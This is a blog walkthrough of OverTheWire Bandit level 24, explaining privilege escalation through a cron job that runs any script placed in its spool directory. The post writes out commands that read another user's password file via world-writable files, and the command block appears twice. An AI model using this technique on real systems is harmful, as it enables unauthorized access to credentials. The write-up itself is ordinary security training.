- Get link
- X
- Other Apps
- Get link
- X
- Other Apps
Bandit Level 24 Walkthrough
Level 23 ➔ Level 24: Writing My First Exploit Script
1. My Objective
I am currently logged in as bandit23. My mission is to retrieve the password for bandit24. The system has a Cron job that runs a script every minute as the user bandit24. This script looks into a specific "Drop Box" directory (/var/spool/bandit24/foo/) and executes every file it finds inside, then deletes it. My goal is to create a shell script that tells the system to give me the password and place it in that folder.
The Mission Clue: I am a low-privilege user, but I can write a set of instructions for a high-privilege user to carry out. Since the Cron job runs as bandit24, my script will have bandit24's permissions when it runs!
2. The Feynman Explanation: The Automated Janitor
How do I get into a locked vault if I don't have the key? I give a list of instructions to someone who does have the key.
The Work Order Analogy:
Imagine there is an Automated Janitor (the Cron Job) who walks through the building every hour. He has a Master Key (permissions) that opens every office. He is programmed to go to a specific basket in the hallway, pick up any Work Orders (scripts) he finds, do exactly what they say, and then shred the order.
I can't go into the Manager's office to read his secret files. But I can put a work order in the basket.
My work order says: "Go into the Manager's office, copy the secret password onto a piece of paper, and leave that paper on my desk in the hallway." Since the Janitor is the one doing the work, the door is unlocked for him. I just have to wait for him to finish and check my desk. This is the essence of privilege escalation via automation.
3. Practical Solution
I start by investigating the Cron script to see exactly how it handles my files.
# Step 1: Read the Janitor's instructions
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
# The script loops through files in /var/spool/bandit24/foo/ and executes them.
# Step 2: Create a temporary workspace and my exploit script
bandit23@bandit:~$ mkdir /tmp/pritom_exploit
bandit23@bandit:~$ cd /tmp/pritom_exploit
bandit23@bandit:~$ echo 'cat /etc/bandit_pass/bandit24 > /tmp/pritom_exploit/pass.txt' > script.sh
# Step 3: Crucial - Set permissions so EVERYONE can read/write/execute
bandit23@bandit:~$ chmod 777 script.sh
bandit23@bandit:~$ touch pass.txt
bandit23@bandit:~$ chmod 777 pass.txt
# Step 4: Drop the script into the Janitor's basket
bandit23@bandit:~$ cp script.sh /var/spool/bandit24/foo/script.sh
# Step 5: Wait 1 minute, then check my "desk" for the password
bandit23@bandit:~$ cat pass.txt
VAfSAn929SAb36906sV... (Password Revealed!)
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
# The script loops through files in /var/spool/bandit24/foo/ and executes them.
# Step 2: Create a temporary workspace and my exploit script
bandit23@bandit:~$ mkdir /tmp/pritom_exploit
bandit23@bandit:~$ cd /tmp/pritom_exploit
bandit23@bandit:~$ echo 'cat /etc/bandit_pass/bandit24 > /tmp/pritom_exploit/pass.txt' > script.sh
# Step 3: Crucial - Set permissions so EVERYONE can read/write/execute
bandit23@bandit:~$ chmod 777 script.sh
bandit23@bandit:~$ touch pass.txt
bandit23@bandit:~$ chmod 777 pass.txt
# Step 4: Drop the script into the Janitor's basket
bandit23@bandit:~$ cp script.sh /var/spool/bandit24/foo/script.sh
# Step 5: Wait 1 minute, then check my "desk" for the password
bandit23@bandit:~$ cat pass.txt
VAfSAn929SAb36906sV... (Password Revealed!)
Why did I use chmod 777?
Permissions are the most common reason scripts fail in this level. When the Cron job runs, it is bandit24 trying to read and execute my file. If I don't give "Others" (the world) permission to read and execute the script, the Janitor will just ignore it. I also made pass.txt world-writable so the Janitor could actually write the password into it.
🚀 My Pro Tips: Debugging My First Script
✨ Use Absolute Paths
In a script run by a Cron job, I never use relative paths (like ./file). The Cron job might be running from a different directory than I expect. I always use full paths like /tmp/work/pass.txt to ensure the script finds its targets.
⭐ The Shebang Line
Professionally, I should start every script with #!/bin/bash. This tells the system exactly which interpreter to use to run the commands. While cat might work without it in this game, it is a vital habit for real-world scripting.
🔍 The Vanishing Act
The image note says "your shell script is removed once executed." This is a common security practice—deleting evidence of a task. I always keep a backup copy of my script in /tmp in case I made a typo and need to try again.
4. Why this matters
This is my first taste of a real "exploit." In the professional world, this is how attackers take over systems. They look for processes running as root or admin that automatically handle user files. If a developer isn't careful, an attacker can "inject" a script just like I did, gaining full control of the server. Understanding this makes me a better defender.
Scripting Milestone Reached!
I've successfully used a custom script to manipulate system behavior. I'll save this password and move on to Level 24 ➔ Level 25, where I will face a brute-force challenge!
Tags: #Linux #Bandit #OverTheWire #ShellScripting #CronJob #PrivilegeEscalation #Chmod #Exploit #CyberSecurity #FeynmanTechnique #CodeWithPritom #ProTips
- Get link
- X
- Other Apps
Devoted to excellence as a Software Engineer
Comments
Post a Comment